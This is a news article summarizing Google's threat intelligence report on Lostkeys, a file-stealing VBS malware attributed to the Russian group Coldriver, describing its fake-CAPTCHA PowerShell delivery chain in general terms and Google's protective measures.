The Google Threat Intelligence Group (GTIG) recently released a report detailing a newly identified malware strain named Lostkeys. This data theft malware is suspected to be associated with the Russian threat group known as Coldriver. The malicious software poses a significant risk, as it is distributed through a multi-step process that begins with lure websites designed to entice victims.
New Malware Linked to Russian Threat Group Coldriver Identified
In a blog post, Google disclosed that Lostkeys was first detected in January, with further sightings noted in both March and April. This malware appears to be an addition to Coldriver’s arsenal, which is also known by aliases such as UNC4057, Star Blizzard, and Callisto.
The Coldriver group has gained notoriety for executing credential phishing attacks targeting various organizations, including NATO governments, non-governmental organizations (NGOs), military institutions, journalists, and diplomatic personnel. Their activities have previously been linked to the Spica malware in 2024.
The group’s tactics involve a more sophisticated approach than standard phishing operations. Initially, they send out deceptive emails that impersonate credible institutions, which include links to lure websites. These websites often feature false CAPTCHA prompts designed to mislead victims into believing they are legitimate. When users complete the CAPTCHA, malicious PowerShell code is copied to their clipboard.
PowerShell is a built-in command-line shell and scripting language extensively used for administrative tasks, automation, and configuration management within Windows environments. Its inherent capabilities often make it a tool of choice for cybercriminals to download and execute malware directly in memory.
After copying the PowerShell code, victims are urged to run it through the “run” prompt. This action initiates a second phase that calculates the MD5 hash of the device’s display resolution. Typically, this is followed by a third phase that seeks to avoid execution in virtual machines if the earlier hash detection is unsuccessful.
Following these steps, further code execution retrieves and decodes the malware’s final payload, which is a Visual Basic Script (VBS) file known as Lostkeys. According to GTIG, this malware is capable of “stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker.”
Google notes that Coldriver generally utilizes malware to extract emails and contacts from their targets; however, they are also known to leverage malware such as Spica to gain access to documents stored on affected systems. Lostkeys serves a similar purpose.
In response to these threats, Google has incorporated all identified malicious websites, domains, and files into the Safe Browsing feature of Google Chrome to safeguard users from potential exploitation. Moreover, the tech company is dispatching alerts to targeted Gmail and Workspace users regarding state-sponsored attacks, encouraging them to enable Enhanced Safe Browsing for added protection.
